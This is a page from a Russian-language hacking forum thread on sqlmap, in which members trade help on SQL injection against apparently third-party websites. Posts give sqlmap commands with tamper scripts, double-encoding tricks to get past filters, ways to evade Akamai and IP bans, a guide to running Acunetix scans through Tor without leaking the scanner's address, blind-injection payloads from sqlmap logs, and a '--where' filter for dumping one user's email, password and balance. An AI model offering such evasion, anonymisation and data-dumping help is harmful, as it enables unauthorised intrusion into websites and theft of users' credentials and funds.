FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 110 из 115

110

Опции темы

Поиск в этой теме

Опции просмотра

23.12.2020, 15:03

fandor9

Постоянный

Регистрация: 16.11.2018

Сообщений: 620

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от LeninDie

↑
подскажите что написать в коде темпера для того чтоб он при запросах менял select на %53%45%4c%45%43%54
я попробовал сделать вот так.

Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела?

Цитата:

Сообщение от LeninDie

↑
кто нибудь знает как можно обойти фильтры на ()?
it appears that some non-alphanumeric characters (i.e. ()) are filtered by the back-end server.

Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38

Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('

24.12.2020, 20:40

LeninDie

Познающий

Регистрация: 26.12.2015

Сообщений: 34

Провел на форуме:
12479

Репутация: 2

Цитата:

Сообщение от fandor9

↑
Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела?
Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38
Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('

Спасибо, попробовал, но к сожалению не помогло. Может быть есть еще какие то варианты?

25.12.2020, 22:28

dzhim2014

Новичок

Регистрация: 18.10.2013

Сообщений: 3

Провел на форуме:
1060

Репутация: 0

Цитата:

Сообщение от fandor9

↑
Насколько я понимаю, это звания баз данных в неправильной
кодировке
.
Можете посмотреть используемую кодировку с помощью

Код:

SELECT SCHEMA_NAME 'database', default_character_set_name 'charset', DEFAULT_COLLATION_NAME 'collation' FROM information_schema.SCHEMATA;

А как быть когда dbms = INFORMIX ?

https://prnt.sc/w9vw7e

2. Какие на сегодня существуют методы обхода AKAMAI ?

ПЫСЫ: fandor9 ,случаем платных консультаций не оказываете?

24.01.2021, 19:38

grimnir

Познавший АНТИЧАТ

Регистрация: 23.04.2012

Сообщений: 1,109

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от Gigggs

↑
пипл сори что не по теме , не могу найти нужную.. и я и много людей тут спрашивали по поводу уязвимостей сканом из Acunetix . Пожалуйста подскажите как через прокси пустить скан , ну что бы не банило ип при скане и не зависал скан, я имею в виду в веб. Извиняюсь еще раз что не в этой теме , подскажите пожалуйста.

Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

1)Если нужна работа через тор

качаем privoxy_3.0.28

правим конфиг

forward-socks5t / 127.0.0.1:9150 .

forward-socks4 / 127.0.0.1:9150 .

forward-socks4a / 127.0.0.1:9150 .

12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy

и меняем на 127.0.0.1 порт 8118

13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)

Проверить работу можно отключив тор- сайт не будет сканится.

========================

чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор

Server tests:

Apache Tomcat AJP protocol audit

JMX and RMI

Java Debug Wire Protocol (JDWP) audit

Open SSL TLS Heartbleed

PHP Hash Collision DOS

TLS/SSL audit

Target Tests:

Apache Cassandra

FastGI Unauthorized Access

Memcached

Oracle Weblogic T3 XXE

Redis Unath

webLogic RCE

Apache Log4j socket

uWSGI

UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.

29.01.2021, 00:52

Gigggs

Новичок

Регистрация: 12.01.2017

Сообщений: 10

Провел на форуме:
3469

Репутация: 0

Подскажите пожалуйста в чем может быть проблема..

retrieving таблиц с начало норм шло

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Parameter: sort_by (POST)

Type: boolean-based blind

Title: Boolean-based blind - Parameter replace (original value)

5:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_tracking_visits_today

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 10

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_widgets

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 19

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_widgets_comments

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 9

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: b?ppd?pp?

А потом вот такая вот хрень пошла resumed: b?ppd?pp?

[15:11:36] [PAYLOAD] (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x687564736f6e61745f6169 LIMIT 62,1),10,1))>57) THEN 0x6966286e6f7728293d7379736461746528292c736c656570 2830292c3029 ELSE (SELECT 8755 UNION SELECT 5075) END))

[15:11:38] [INFO] retrieved: b?ppd?pp?

Заранее спасибо.

30.01.2021, 16:09

polzunki

Новичок

Регистрация: 28.07.2020

Сообщений: 21

Провел на форуме:
7210

Репутация: 0

Приветствую

Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

30.01.2021, 18:26

d_dwacawaca

Познающий

Регистрация: 04.01.2021

Сообщений: 35

Провел на форуме:
7581

Репутация: 0

Цитата:

Сообщение от polzunki

↑
Приветствую
Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "
https://site.com
" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs
View attachment 12400

Используй прокси, пусти трафик через ТОР

Попробуй с того же IP, но почисти куки.

10.02.2021, 16:19

Duble

Познающий

Регистрация: 28.10.2015

Сообщений: 59

Провел на форуме:
15943

Репутация: 0

Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id

Мой запрос

Код:

users -C id,email,password,money  --dump

Мне допустим надо юзер с ID 123

10.02.2021, 17:02

Baskin-Robbins

Участник форума

Регистрация: 15.09.2018

Сообщений: 236

Провел на форуме:
92829

Репутация: 212

Цитата:

Сообщение от Duble

↑
Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
Мой запрос

Код:

users -C id,email,password,money  --dump

Мне допустим надо юзер с ID 123

Цитата:

Сообщение от karkajoi

↑
--where="email='
admin@admin.com
'" так будет работать

Цитата:

Сообщение от joelblack

↑

Код:

--where "id IN (1,3)"

#10

14.02.2021, 15:53

brown

Участник форума

Регистрация: 16.10.2016

Сообщений: 189

Провел на форуме:
43449

Репутация: 1

[12:51:44] [INFO] fetching database names

[12:51:44] [INFO] fetching number of databases

[12:51:44] [PAYLOAD] -3870

you provided a HTTP Cookie header value, while target URL provides its own cooki

es within HTTP Set-Cookie header which intersect with yours. Do you want to merg

e them in further requests? [Y/n] Y

[12:51:44] [DEBUG] used the default behavior, running in batch mode

[12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN

[12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN

[12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN

[12:51:54] [INFO] retrieved:

[12:51:54] [INFO] retrieved:

Кто сталкивался?